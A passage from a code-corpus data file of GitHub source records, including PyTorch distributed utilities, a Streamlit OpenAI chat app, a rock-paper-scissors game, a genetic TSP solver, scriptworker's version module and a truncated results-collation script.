parser.add_argument(\n '-version', dest = 'version',\n default = project.version,\n help = 'set the project version'\n )\n \n parser.add_argument(\n '-company', dest = 'company',\n default = project.company,\n help = 'set the project company'\n )\n \n parser.add_argument(\n '-copyrights', dest = 'copyrights',\n default = project.copyrights,\n help = 'set the project copyrights'\n )\n \n parser.add_argument(\n '-description', dest = 'description',\n default = project.description,\n help = 'set the project description'\n )\n \n parser.add_argument(\n '-homepage', dest = 'homepage',\n default = project.urlHomepage,\n help = 'set the project homepage'\n )\n \n parser.add_argument(\n '-forums', dest = 'forums',\n default = project.urlForums,\n help = 'set the project forums'\n )\n \n parser.add_argument(\n '-issues', dest = 'issues',\n default = project.urlIssuesTracker,\n help = 'set the project issues'\n )\n '''\n \n '''parser.add_argument('integers', metavar='N', type=int, nargs='+',\n help='an integer for the accumulator')'''\n \n '''parser.add_argument('--sum', dest='accumulate', action='store_const',\n const=sum, default=max,\n help='sum the integers (default: find the max)')'''\n\n #args = parser.parse_args()\n \n #project.version = args.version\n \n project.run()\n sys.exit( 0 )\n","repo_name":"pasnox/monkeystudio2","sub_path":"tools/project_releaser/src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2050,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"72"} +{"seq_id":"14832016399","text":"import dataclasses\nimport traceback\nfrom typing import Any, Callable, Container, Dict, List, Optional, OrderedDict, Tuple, TypeVar, overload\n\nimport torch\nimport torch.distributed as dist\nfrom torch import nn\nfrom torch.nn.parallel._functions import _get_stream\nfrom torch.nn.parallel.scatter_gather import _is_namedtuple\nfrom torch.nn.utils.rnn import PackedSequence\n\n__all__ = [] # type: ignore[var-annotated]\n\n\ndef _pack_kwargs(*args: Any, **kwargs: Any) -> Tuple[Tuple[Any, ...], Tuple[str, ...]]:\n \"\"\"\n Turn argument list into separate key list and value list (unpack_kwargs does the opposite)\n Inspiration: https://github.com/facebookresearch/fairscale/blob/eeb6684/fairscale/internal/containers.py#L70\n Usage::\n\n kwarg_keys, flat_args = pack_kwargs(1, 2, a=3, b=4)\n assert kwarg_keys == (\"a\", \"b\")\n assert flat_args == (1, 2, 3, 4)\n args, kwargs = unpack_kwargs(kwarg_keys, flat_args)\n assert args == (1, 2)\n assert kwargs == {\"a\": 3, \"b\": 4}\n Returns:\n Tuple[Tuple[Any, ...], Tuple[str, ...]]: The first tuple element gives\n gives both positional args and kwarg values, where the positional args\n proceed kwarg values and kwarg values are ordered consistently with the\n kwarg keys. The second tuple element gives the kwarg keys.\n The second tuple element's length is at most the first tuple element's length.\n \"\"\"\n kwarg_keys: List[str] = []\n flat_args: List[Any] = list(args)\n for k, v in kwargs.items():\n kwarg_keys.append(k)\n flat_args.append(v)\n\n return tuple(flat_args), tuple(kwarg_keys)\n\ndef _cast_forward_inputs(\n dtype: Optional[torch.dtype],\n *args: Any,\n **kwargs: Any,\n) -> Tuple[Any, Any]:\n \"\"\"\n Casts floating point tensors in ``args`` and ``kwargs`` to ``input_dtype``.\n This respects the existing ``requires_grad`` on the tensors.\n \"\"\"\n if dtype is None:\n return args, kwargs\n\n def cast_fn(x: torch.Tensor) -> torch.Tensor:\n if not torch.is_floating_point(x) or x.dtype == dtype:\n return x\n return x.to(dtype)\n\n return (_apply_to_tensors(cast_fn, args), _apply_to_tensors(cast_fn, kwargs))\n\ndef _unpack_kwargs(flat_args: Tuple[Any, ...], kwarg_keys: Tuple[str, ...]) -> Tuple[Tuple[Any, ...], Dict[str, Any]]:\n \"\"\"See _pack_kwargs.\"\"\"\n assert len(kwarg_keys) <= len(\n flat_args\n ), f\"too many keys {len(kwarg_keys)} vs. {len(flat_args)}\"\n if len(kwarg_keys) == 0:\n return flat_args, {}\n args = flat_args[: -len(kwarg_keys)]\n kwargs = dict(zip(kwarg_keys, flat_args[-len(kwarg_keys) :]))\n return args, kwargs\n\n\nS = TypeVar(\"S\", dict, list, tuple)\nT = TypeVar(\"T\", torch.Tensor, PackedSequence)\n\n\n@overload\ndef _recursive_to(inputs: S, target_device: torch.device, use_side_stream_for_tensor_copies: bool) -> List[S]:\n ...\n\n\n@overload\ndef _recursive_to(inputs: T, target_device: torch.device, use_side_stream_for_tensor_copies: bool) -> Tuple[T]:\n ...\n\n\ndef _recursive_to(inputs, target_device, use_side_stream_for_tensor_copies):\n r\"\"\"\n Recursively moves input to the target_device.\n \"\"\"\n\n def to_map(obj):\n if isinstance(obj, (torch.Tensor, PackedSequence)):\n device = obj.data.device if isinstance(obj, PackedSequence) else obj.device\n if device == target_device:\n return (obj,)\n if not use_side_stream_for_tensor_copies:\n return (obj.to(target_device),)\n else:\n # If the custom module is not registered to torch, stream is not used for acceleration\n device_mod = getattr(torch, device.type, None)\n if device.type == \"cpu\" or device_mod is None:\n return (obj.to(target_device),)\n # Perform CPU -> target_device copies in a background stream. This code is\n # motivated from similar logic in torch/nn/parallel/_functions.py\n stream = _get_stream(target_device)\n with device_mod.stream(stream):\n output = obj.to(target_device)\n # synchronize with the copy stream\n with device_mod.device(target_device.index):\n current_stream = device_mod.current_stream()\n # Sync the current stream with the copy stream\n current_stream.wait_stream(stream)\n # Ensure tensor memory is not reused until work on\n # main stream is complete\n if isinstance(obj, PackedSequence):\n output.data.record_stream(current_stream) # type: ignore[arg-type]\n else:\n assert isinstance(output, torch.Tensor)\n output.record_stream(current_stream) # type: ignore[arg-type]\n return (output,)\n if _is_namedtuple(obj):\n return [type(obj)(*args) for args in zip(*map(to_map, obj))]\n if isinstance(obj, tuple) and len(obj) > 0:\n return list(zip(*map(to_map, obj)))\n if isinstance(obj, list) and len(obj) > 0:\n return [list(i) for i in zip(*map(to_map, obj))]\n if isinstance(obj, dict) and len(obj) > 0:\n return [type(obj)(i) for i in zip(*map(to_map, obj.items()))]\n return [obj]\n\n # Avoid reference cycle\n try:\n res = to_map(inputs)\n finally:\n to_map = None # type: ignore[assignment]\n return res\n\n\ndef _p_assert(cond: Any, s: str, raise_assertion_error: bool = True) -> None:\n \"\"\"This is used as an alternate to ``assert`` when in the backward context\n to print the error message ``s`` since otherwise, it is swallowed.\"\"\"\n if not cond:\n print(s)\n traceback.print_stack()\n if raise_assertion_error:\n raise AssertionError(s)\n\n\ndef _alloc_storage(tensor: torch.Tensor, size: torch.Size) -> None:\n \"\"\"\n Allocate storage for ``tensor`` with the given size.\n\n Returns:\n bool: ``True`` if this method allocated storage and ``False`` if the\n storage was already allocated.\n \"\"\"\n with torch.no_grad():\n already_allocated = tensor._typed_storage()._size() == size.numel()\n if not already_allocated:\n tensor_storage_size = tensor._typed_storage()._size()\n _p_assert(\n tensor_storage_size == 0,\n f\"Tensor storage should have been resized to be 0 but got {tensor_storage_size}\",\n )\n tensor._typed_storage()._resize_(size.numel())\n\n\n\ndef _free_storage(tensor: torch.Tensor) -> None:\n \"\"\"\n Frees the underlying storage of ``tensor``.\n\n Returns:\n bool: ``True`` if the method freed the storage and ``False`` if the\n storage was already freed.\n \"\"\"\n with torch.no_grad():\n already_freed = tensor._typed_storage()._size() == 0\n if not already_freed:\n _p_assert(\n tensor.storage_offset() == 0,\n \"Freeing a tensor's storage is unsafe when it is not the sole occupant\\n\"\n f\"storage offset: {tensor.storage_offset()}\\n\"\n f\"storage size: {tensor._typed_storage()._size()}\\n\"\n f\"tensor shape: {tensor.shape}\",\n )\n tensor._typed_storage()._resize_(0)\n\n\nQ = TypeVar(\"Q\")\nR = TypeVar(\"R\", dict, list, tuple, set, OrderedDict, PackedSequence, Any)\n\n\n@overload\ndef _apply_to_tensors(fn: Callable[[torch.Tensor], Q], container: torch.Tensor) -> Q:\n ...\n\n\n@overload\ndef _apply_to_tensors(fn: Callable[[torch.Tensor], Any], container: R) -> R:\n ...\n\n\ndef _apply_to_tensors(fn, container):\n \"\"\"Recursively apply to all tensor in different kinds of container types.\"\"\"\n\n def apply(x):\n if isinstance(x, torch.Tensor):\n return fn(x)\n elif hasattr(x, \"__dataclass_fields__\"):\n dc = dataclasses.replace(x)\n for f in dataclasses.fields(dc):\n name = f.name\n setattr(dc, name, apply(getattr(dc, name)))\n return dc\n elif isinstance(x, OrderedDict):\n od = x.__class__()\n for key, value in x.items():\n od[key] = apply(value)\n return od\n elif isinstance(x, PackedSequence):\n apply(x.data)\n return x\n elif isinstance(x, dict):\n return {key: apply(value) for key, value in x.items()}\n elif _is_namedtuple(x):\n res = (apply(el) for el in x)\n return type(x)(*res)\n elif isinstance(x, (list, tuple, set)):\n return type(x)(apply(el) for el in x)\n else:\n return x\n\n return apply(container)\n\n\ndef _to_kwargs(\n inputs: Tuple[Any, ...],\n kwargs: Optional[Dict[str, Any]],\n target_device: torch.device,\n use_side_stream_for_tensor_copies: bool,\n) -> Tuple[Tuple[Any, ...], Tuple[Dict[str, Any], ...]]:\n moved_inputs = (\n _recursive_to(inputs, target_device, use_side_stream_for_tensor_copies)\n if inputs\n else []\n )\n moved_kwargs = (\n _recursive_to(kwargs, target_device, use_side_stream_for_tensor_copies)\n if kwargs\n else []\n )\n if len(moved_inputs) < len(moved_kwargs):\n moved_inputs.extend([() for _ in range(len(moved_kwargs) - len(inputs))])\n elif len(moved_kwargs) < len(moved_inputs):\n moved_kwargs.extend([{} for _ in range(len(moved_inputs) - len(moved_kwargs))])\n return tuple(moved_inputs), tuple(moved_kwargs)\n\n\ndef _verify_param_shape_across_processes(\n process_group: dist.ProcessGroup, tensors: List[torch.Tensor], logger: Optional[dist.Logger] = None\n):\n return dist._verify_params_across_processes(process_group, tensors, logger)\n\n\ndef _sync_module_states(\n module: nn.Module,\n process_group: dist.ProcessGroup,\n broadcast_bucket_size: int,\n src: int,\n params_and_buffers_to_ignore: Container[str],\n broadcast_buffers: bool = True,\n) -> None:\n \"\"\"\n Syncs ``module``'s parameters and buffers state so that all ranks contain\n the same module state across all ranks. Note that this API assumes that all\n parameter shapes are consistent before running the synchronization. This can\n be checked with ``_verify_param_shape_across_processes``.\n \"\"\"\n module_states: List[torch.Tensor] = []\n for name, param in module.named_parameters():\n if name not in params_and_buffers_to_ignore:\n module_states.append(param.detach())\n\n if broadcast_buffers:\n for name, buffer in module.named_buffers():\n if name not in params_and_buffers_to_ignore:\n module_states.append(buffer.detach())\n\n _sync_params_and_buffers(process_group, module_states, broadcast_bucket_size, src)\n\n\ndef _sync_params_and_buffers(\n process_group: dist.ProcessGroup,\n module_states: List[torch.Tensor],\n broadcast_bucket_size: int,\n src: int,\n) -> None:\n \"\"\"\n Synchronizes ``module_states`` (list of tensors) across all processes by\n broadcasting them from rank 0.\n \"\"\"\n if len(module_states) > 0:\n dist._broadcast_coalesced(\n process_group, module_states, broadcast_bucket_size, src\n )\n\n\ndef _replace_by_prefix(\n state_dict: Dict[str, Any],\n old_prefix: str,\n new_prefix: str,\n) -> None:\n \"\"\"\n Replace all keys that match a given old_prefix with a new_prefix (in-place).\n\n Usage::\n\n state_dict = {\"layer.xyz\": torch.tensor(1)}\n replace_by_prefix_(state_dict, \"layer.\", \"module.layer.\")\n assert state_dict == {\"module.layer.xyz\": torch.tensor(1)}\n \"\"\"\n if old_prefix == new_prefix:\n raise ValueError(\"old_prefix and new_prefix must be distinct\")\n for key in list(state_dict.keys()):\n if not key.startswith(old_prefix):\n continue\n new_key = new_prefix + key[len(old_prefix) :]\n state_dict[new_key] = state_dict[key]\n del state_dict[key]\n","repo_name":"pytorch/pytorch","sub_path":"torch/distributed/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":11967,"program_lang":"python","lang":"en","doc_type":"code","stars":72779,"dataset":"github-code","pt":"72"} +{"seq_id":"4858515818","text":"rock = '''\n _______\n---' ____)\n (_____)\n (_____)\n (____)\n---.__(___)\n'''\n\npaper = '''\n _______\n---' ____)____\n ______)\n _______)\n _______)\n---.__________)\n'''\n\nscissors = '''\n _______\n---' ____)____\n ______)\n __________)\n (____)\n---.__(___)\n'''\n\n\nimport random\n\n###USER_SIDE###\n\nuser_choice = int(input(\"What do you choose? Type 0 for Rock, 1 for Paper or 2 for Scissors. \"))\n\nif user_choice == 0:\n print(rock)\n\nelif user_choice == 1:\n print(paper)\n\nelif user_choice ==2:\n print(scissors)\n\nelse:\n print(\"You typed an invalid number. You lose!\")\n\n###COMPUTER_SIDE###\n\ncomputer_choice = random.randint(0, 2)\n\nif user_choice >= 3 or user_choice < 0:\n print()\n\nelif computer_choice == 0:\n print(f\"Computer chose: {rock}\")\n\nelif computer_choice == 1:\n print(f\"Computer chose: {paper}\")\n\nelse:\n print(f\"Computer chose: {scissors}\")\n\n###RESULT###\n\nif user_choice == 0 and computer_choice == 0:\n print(\"It's a draw. Try again!\") \n\nelif user_choice == 0 and computer_choice == 1:\n print(\"You lost.\") \n\nelif user_choice == 0 and computer_choice == 2:\n print(\"You win! Congrats :D\") \n\nif user_choice == 1 and computer_choice == 0:\n print(\"You win! Congrats :D\") \n\nelif user_choice == 1 and computer_choice == 1:\n print(\"It's a draw. Try again!\") \n\nelif user_choice == 1 and computer_choice == 2:\n print(\"You lost.\")\n\nif user_choice == 2 and computer_choice == 0:\n print(\"You lost.\")\n\nelif user_choice == 2 and computer_choice == 1:\n print(\"You win! Congrats :D\") \n\nelif user_choice == 2 and computer_choice == 2:\n print(\"It's a draw. Try again!\") \n\n\n###ANSWER_RESULT###\n\n# if user_choice >= 3 or user_choice < 0:\n# print(\"You typed an invalid number, you lose!\")\n\n# elif user_choice == 0 and computer_choice == 2:\n# print(\"You win!\")\n\n# elif computer_choice == 0 and user_choice == 2:\n# print(\"You lose.\")\n\n# elif computer_choice > user_choice:\n# print(\"You lose.\")\n\n# elif user_choice > computer_choice:\n# print(\"You win!\")\n\n# elif computer_choice == user_choice:\n# print(\"It's a draw. Try again :D\")","repo_name":"ChiakiNL/Udemy","sub_path":"100Days_Python_Bootcamp/Day_04/Day4_Project_Rock_Paper_Scissors_Game.py","file_name":"Day4_Project_Rock_Paper_Scissors_Game.py","file_ext":"py","file_size_in_byte":2097,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"5059959068","text":"import numpy as np\nimport tensorflow as tf\nfrom cells import propogation_Cell\nfrom utils import relu_init, tanh_init, zeros, const\n\n\nclass Network(object):\n\n def __init__(self, config):\n self.config = config\n self.global_step = tf.Variable(0, name=\"global_step\", trainable=False) # Epoch\n self.cell = None\n self.attn_values = tf.constant(0)\n self.gating_values = tf.constant(0)\n\n def variable_summaries(self):\n with tf.name_scope('summaries'):\n for k in tf.trainable_variables():\n name = '-'.join(k.name.split('/')[-2:])\n tf.summary.histogram(name, k)\n\n def get_path_data(self, x_attr, x_lengths, keep_prob_in, keep_prob_out, path_matrix, state=None):\n\n steps, batch_size = tf.shape(x_attr)[0], tf.shape(x_attr)[1]\n num_units = self.config.mRNN._hidden_size\n\n # Sparse drop used outside tensor graph\n # with tf.variable_scope('InputDropout'):\n # x_attr = tf.nn.dropout(x_attr, keep_prob_in)\n\n with tf.variable_scope('MyCell') as scope:\n inputs = tf.split(x_attr, num_or_size_splits=self.config.num_steps, axis=0)\n path_matrix = tf.split(path_matrix, num_or_size_splits=self.config.num_steps, axis=0)\n\n cell = propogation_Cell(self.config)\n state = (tf.zeros((batch_size, num_units)), tf.zeros((batch_size, num_units)))\n for tstep in range(len(inputs)):\n if tstep == len(inputs) - 1:\n state, labels, self.attn_values, self.gating_values = cell.__call__(inputs[tstep][0], state, path_matrix[tstep][0], keep_prob_in, keep_prob_out,\n get_labels=True)\n else:\n state = cell.__call__(inputs[tstep][0], state, path_matrix[tstep][0], keep_prob_in, keep_prob_out,\n get_labels=False)\n scope.reuse_variables()\n\n return state, labels\n\n def consensus_loss(self, predictions, pred_mean):\n pred_mean = tf.reduce_mean(predictions)\n cross_loss = -1*tf.reduce_mean(tf.multiply(pred_mean, tf.log(1e-10 + predictions)))\n return cross_loss\n\n def loss(self, predictions, labels, wce):\n if self.config.data_sets._multi_label:\n cross_loss = tf.add(tf.log(1e-10 + predictions) * labels,\n tf.log(1e-10 + (1 - predictions)) * (1 - labels))\n cross_entropy_label = -1 * tf.reduce_mean(tf.reduce_sum(wce * cross_loss, 1))\n else:\n cross_loss = labels * tf.log(predictions + 1e-10)\n cross_entropy_label = tf.reduce_mean(-tf.reduce_sum(wce * cross_loss, 1))\n\n return cross_entropy_label\n\n def L2loss(self):\n # wts = ['W_xh', 'W_hh', 'W_L']\n # with tf.variable_scope('L2_loss'):\n # if self.config.solver._L2loss:\n # L2_loss = tf.add_n([tf.nn.l2_loss(v) if v.name.split('/')[-1].split(':')[0] in wts else tf.constant(0.0)\n # for v in tf.trainable_variables()])\n with tf.variable_scope('L2_loss'):\n if self.config.solver._L2loss:\n L2_loss = tf.add_n([tf.nn.l2_loss(v) for v in tf.trainable_variables()])\n return L2_loss\n\n def training(self, loss, optimizer):\n train_op = optimizer.minimize(loss[0])\n return train_op\n\n def custom_training(self, loss, optimizer, batch_size):\n\n # gradient accumulation over multiple batches\n # http://stackoverflow.com/questions/42156957/how-to-update-model-parameters-with-accumulated-gradients\n # https://github.com/DrSleep/tensorflow-deeplab-resnet/issues/18#issuecomment-279702843\n #batch_size = tf.Print(batch_size, [batch_size], message=\"Batch size: \")\n with tf.variable_scope('custom_training'):\n\n tvs = tf.trainable_variables()\n accum_grads = [tf.Variable(tf.zeros_like(tv.initialized_value()), trainable=False) for tv in tvs]\n reset_op = [v.assign(tf.zeros_like(v)) for v in accum_grads]\n\n gvs = tf.gradients(loss, tvs) # compute gradients\n accum_op = [accum_grads[i].assign_add(gv) for i, gv in enumerate(gvs)] # accumulate computed gradients\n\n normalized_grads = [var/batch_size for var in accum_grads]\n update_op = optimizer.apply_gradients(zip(normalized_grads, tvs))\n\n return reset_op, accum_op, update_op\n\n\n\n\n\n","repo_name":"PriyeshV/GAP_Kernels_DFS","sub_path":"network.py","file_name":"network.py","file_ext":"py","file_size_in_byte":4486,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"12676573013","text":"\r\ndef app():\r\n\r\n import streamlit as st\r\n from streamlit_chat import message\r\n import os\r\n import openai\r\n from dotenv import load_dotenv\r\n\r\n load_dotenv()\r\n openai.api_key = os.getenv('OPEN_API')\r\n \r\n st.balloons()\r\n\r\n\r\n if \"key\" not in st.session_state:\r\n st.session_state[\"key\"]=[]\r\n st.session_state[\"value\"]=[]\r\n\r\n def update_first():\r\n st.session_state[\"key\"].append(title)\r\n st.session_state[\"value\"].append(True)\r\n\r\n def update_second(value):\r\n st.session_state[\"key\"].append(value)\r\n st.session_state[\"value\"].append(False)\r\n\r\n st.header('Cheri AI created by Dr.Sherwin Roger :purple_heart:')\r\n\r\n container = st.container()\r\n\r\n form = st.form(key='form')\r\n title=form.text_input(label='Enter some text')\r\n form.form_submit_button(label='Submit',on_click=update_first,type='secondary')\r\n\r\n with container:\r\n\r\n if title:\r\n for i,j in zip(st.session_state[\"key\"],st.session_state[\"value\"]):\r\n\r\n if i!='':\r\n if j==True:\r\n message(str(i),is_user=j,key=str(os.urandom(16).hex()))\r\n else:\r\n st.code(i)\r\n\r\n response = openai.Completion.create(\r\n prompt=title,\r\n model=\"text-davinci-003\",\r\n temperature=0.5,\r\n max_tokens=2000,\r\n top_p=1,\r\n frequency_penalty=1,\r\n presence_penalty=1\r\n )\r\n if title=='hi' or title==\"Hi\":\r\n response.choices[0].text=\"hello\"\r\n update_second(str(response.choices[0].text))\r\n st.code(response.choices[0].text)\r\n message(title,is_user=True,key=str(os.urandom(16).hex()))\r\n\r\n\r\n sound = st.empty()\r\n sound.audio(\"hello.mp3\")\r\n","repo_name":"sherwin-roger0/Cheri-GPT","sub_path":"app1.py","file_name":"app1.py","file_ext":"py","file_size_in_byte":1827,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"29201412665","text":"from typing import List\n\nfrom path import Path\nfrom crossingover import get_children\nfrom mutation import swap, swap_neighbor, insert, reverse\nimport time\nimport random\n\n\nclass Population:\n parents: List[Path] = []\n children: List[Path] = []\n parents_length = 0\n\n def __init__(self, parent_count: int): # Creating (parent_count) times parent and (parent_count x 2) times children\n self.parents = []\n self.children = []\n self.parents_length = parent_count\n\n for i in range(self.parents_length):\n self.parents.append(Path.get_random_path())\n\n self.print_paths(True, False)\n\n def print_paths(self, is_print_parents: bool, is_print_children: bool):\n\n if is_print_parents:\n print(\"parents:\")\n for i in range(self.parents_length):\n print(f\"{i:02d}\", self.parents[i].cities, \"cost: \", self.parents[i].cost)\n print(\"\\n\")\n\n if is_print_children:\n print(\"children:\")\n for i in range(len(self.children)):\n print(f\"{i:02d}\", self.children[i].cities, \"cost: \", self.children[i].cost)\n print(\"\\n\")\n\n def iteration(self, iteration_count):\n\n for i in range(iteration_count):\n self.children.clear()\n self.children.extend(get_children(self.parents))\n\n def create_new_children(self):\n\n random.shuffle(pop0.parents)\n self.children = []\n length = int(self.parents_length / 2)\n for i in range(length):\n self.children.extend(get_children(self.parents[2 * i % self.parents_length], self.parents[2 * i % self.parents_length + 1]))\n #random.shuffle(pop0.parents)\n self.children.extend(get_children(self.parents[2 * i % self.parents_length], self.parents[2 * i % self.parents_length + 1]))\n\n def select_new_parents(self):\n for i in range(self.parents_length):\n if self.children[i].cost < self.parents[i].cost:\n is_new = True\n for j in range(self.parents_length):\n if self.children[i].cities == self.parents[j].cities:\n is_new = False\n break\n if is_new:\n self.parents[i].set_cities(self.children[i].cities)\n\n def get_mutation_children(self):\n for i in range(len(self.children)):\n swap(self.children[i])\n\n\nstart = time.time()\n\npop0 = Population(10)\n\nfor i in range(20000):\n pop0.create_new_children()\n pop0.select_new_parents()\n # pop0.get_mutation_children()\n # pop0.select_new_parents()\n # pop0.print_paths(True, True)\n\npop0.print_paths(True, True)\n\nend = time.time()\nprint(\"time: \", end - start)\n","repo_name":"ibrahimKocak/GeneticTspResearchWithPython","sub_path":"population.py","file_name":"population.py","file_ext":"py","file_size_in_byte":2724,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"18013718810","text":"class Solution:\n # def intersection(self, nums1: List[int], nums2: List[int]) -> List[int]:\n # if len(nums1) < len(nums2):\n # min_set = set(nums1)\n # target = nums2\n # else:\n # min_set = set(nums2)\n # target = nums1\n # inter_set = set()\n # for num in target:\n # if num in min_set:\n # inter_set.add(num)\n # return list(inter_set)\n \n # w/o using sets\n def intersection(self, nums1: List[int], nums2: List[int]) -> List[int]:\n nums1.sort()\n nums2.sort()\n n1index = 0\n n2index = 0\n intersection = []\n while n1index < len(nums1) and n2index < len(nums2):\n if nums1[n1index] == nums2[n2index]:\n if not intersection or not intersection[-1] == nums1[n1index]:\n intersection.append(nums1[n1index])\n n1index += 1\n n2index += 1\n elif nums1[n1index] > nums2[n2index]:\n n2index += 1\n elif nums1[n1index] < nums2[n2index]:\n n1index += 1\n return intersection\n \n \n ","repo_name":"vincentt117/coding_challenge","sub_path":"lc_intersection_of_two_arrays.py","file_name":"lc_intersection_of_two_arrays.py","file_ext":"py","file_size_in_byte":1171,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"33975218296","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"Deal with the scriptworker version in semver format.\n\nCopied from scriptharness.\n\nHowever, since writing this I've discovered that setuptools and sphinx don't\naccept all semver formatted versions. It's not clear if this will go away.\n\nWhen called as a script, this will update ../version.json with the appropriate\nversion info.\n\nAttributes:\n __version__ (Tuple[int, int, int, str]): semver version - three integers and an\n optional string.\n __version_string__ (str): semver version in string format.\n\n\"\"\"\nfrom __future__ import absolute_import, division, print_function, unicode_literals\n\nimport json\nimport os\nfrom typing import Optional, Tuple, Union, cast\n\nShortVerType = Tuple[int, int, int]\nLongVerType = Tuple[int, int, int, str]\n\n\n# get_version_string {{{1\ndef get_version_string(version: Union[ShortVerType, LongVerType]) -> str:\n \"\"\"Translate a version tuple into a string.\n\n Specify the __version__ as a tuple for more precise comparisons, and\n translate it to __version_string__ for when that's needed.\n\n This function exists primarily for easier unit testing.\n\n Args:\n version (Tuple[int, int, int, str]): three ints and an optional string.\n\n Returns:\n version_string (str): the tuple translated into a string per PEP 440\n\n \"\"\"\n version_len = len(version)\n if version_len == 3:\n version_string = \"%d.%d.%d\" % cast(ShortVerType, version)\n elif version_len == 4:\n version_string = \"%d.%d.%d.%s\" % cast(LongVerType, version)\n else:\n raise Exception(\"Version tuple is non-semver-compliant {} length!\".format(version_len))\n return version_string\n\n\n# 1}}}\n# Semantic versioning 2.0.0 http://semver.org/\n__version__ = (49, 1, 1)\n__version_string__ = get_version_string(__version__)\n\n\n# write_version {{{1\ndef write_version(name: Optional[str] = None, path: Optional[str] = None) -> None:\n \"\"\"Write the version info to ../version.json, for setup.py.\n\n Args:\n name (Optional[str]): this is for the ``write_version(name=__name__)``\n below. That's one way to both follow the\n ``if __name__ == '__main__':`` convention but also allow for full\n coverage without ignoring parts of the file.\n\n path (Optional[str]): the path to write the version json to. Defaults\n to ../version.json\n \"\"\"\n # Written like this for coverage purposes.\n # http://stackoverflow.com/questions/5850268/how-to-test-or-mock-if-name-main-contents/27084447#27084447\n if name in (None, \"__main__\"):\n path = path or os.path.join(os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__)))), \"version.json\")\n contents = {\"version\": __version__, \"version_string\": __version_string__}\n with open(path, \"w\") as filehandle:\n print(json.dumps(contents, sort_keys=True, indent=4, separators=(\",\", \":\")), file=filehandle)\n\n\nwrite_version(name=__name__)\n","repo_name":"mozilla-releng/scriptworker","sub_path":"src/scriptworker/version.py","file_name":"version.py","file_ext":"py","file_size_in_byte":2942,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"} +{"seq_id":"39797024079","text":"#!/usr/bin/env python\n\n\"\"\"\nScript to collate the results from running the analysis on the test Gaussian runs\n\"\"\"\n\nfrom __future__ import print_function, division\n\nimport sys\nimport os\nimport numpy as np\nimport argparse\nimport subprocess as sp\nfrom scipy.special import erf\nimport tarfile\n\nimport matplotlib as mpl\nfrom matplotlib import pyplot as pl\nimport matplotlib.patches as mpatches\n\nmplparams = { \\\n 'backend': 'Agg',\n 'text.usetex': True, # use LaTeX for all text\n 'axes.linewidth': 0.5, # set axes linewidths to 0.5\n 'axes.grid': True, # add a grid\n 'grid.linewidth': 0.5,\n 'font.family': 'sans-serif',\n 'font.sans-serif': 'Avant Garde, Helvetica, Computer Modern Sans serif',\n 'font.size': 15 }\n\nmpl.rcParams.update(mplparams)\n\nparser = argparse.ArgumentParser( )\nparser.add_argument(\"-i\", \"--input-file\", dest=\"infile\", required=True, help=\"The input tarball file\")\n#parser.add_argument(\"-i\", \"--ndirs\", dest=\"ndirs\", required=True, type=int, help=\"Set the number directories used in the runs.\")\n#parser.add_argument(\"-b\", \"--base-dir\", dest=\"basedir\", help=\"Set the base directory for the runs\")\nparser.add_argument(\"-o\", \"--output-file\", dest=\"outfile\", help=\"Set the output figure file without extension\")\n#parser.add_argument(\"-N\", \"--Nlive\", dest=\"nlives\", action='append', default=None, help=\"Set number of nested samples used (each value passed will be assumed as the base directory name for that data\")\n\n# parse input options\nopts = parser.parse_args()\n\n# the base directory\n#basedir = opts.basedir\n#if not os.path.isdir(basedir):\n# print(\"Error... base directory '%s' does not exist.\" % basedir, file=sys.stderr)\n# sys.exit(1)\n\n#if opts.ndirs < 1:\n# print(\"Error... there must be a positive number of directories.\", file=sys.stderr)\n# sys.exit(1)\n\ntar = tarfile.open(opts.infile, \"r:gz\")\n\nmaxranges = {}\ntrueuls = {}\ntrueevs = {}\ntruekls = {}\nevidences = {}\nupperlimits = {}\nevidenceerrs = {}\nkspvalues = {}\ntimings = {}\n\noformat = '*_stats.txt'\npfile = 'prior.txt'\ntruefile = 'test_gauss.txt'\n\n# calculate the true KL-divergence (required as the calculation used for the value in test_gauss.txt was wrong in the code version that was run for these tests)\ndef kltrue(maxv, sigmah, lnZ):\n prior = 1./maxv\n p_Z = np.exp(np.log(prior)- lnZ)\n\n L = lnZ + 0.5*np.log(2.*np.pi*sigmah**2)\n\n D = -(1.+2.*L)*erf(-maxv/(np.sqrt(2.)*sigmah))\n G = -(1./(np.sqrt(2.*np.pi)*sigmah))*(maxv*np.exp(-0.5*maxv**2/sigmah**2))\n\n return -0.25*p_Z*(D + 2.*G)\n\n#if opts.nlives is None:\n# nlives = ['']\n#else:\n# nlives = []\n# for nlive in opts.nlives:\n# try:\n# nlives.append(str(int(nlive)))\n# except:\n# print(\"Error... could not convert '%s' number of live points to integer\" % nlive, file=sys.stderr)\n# sys.exit(1)\n\n# hard code in run parameters\nnlives = ['512', '1024', '2048', '4096', '8192']\nndirs = ['%03d' % i for i in range(11)]\n\nfor j in range(len(nlives)):\n #livedir = os.path.join(basedir, nlives[j])\n #if len(nlives[j]) == 0:\n # lname = 'Unknown'\n #else:\n # lname = nlives[j]\n lname = nlives[j]\n\n # initialise dictionaries for different numbers of live points\n maxranges[lname] = []\n trueuls[lname] = []\n trueevs[lname] = []\n truekls[lname] = []\n evidences[lname] = []\n upperlimits[lname] = []\n evidenceerrs[lname] = []\n kspvalues[lname] = []\n if timings is not None:\n timings[lname] = []\n\n #if not os.path.isdir(livedir):\n # print(\"Error... '%s' directory does not exist.\" % livedir, file=sys.stderr)\n # sys.exit(1)\n \n #for i in range(opts.ndirs):\n for fdir in ndirs:\n #fdir = os.path.join(livedir, \"%03d\" % i)\n #if not os.path.isdir(fdir):\n # print(\"Error... '%s' directory does not exist.\" % fdir, file=sys.stderr)\n # continue\n \n # get directories for the given number of live points and fdir value\n lpdirs = [(tar.getmember(name), name) for name in 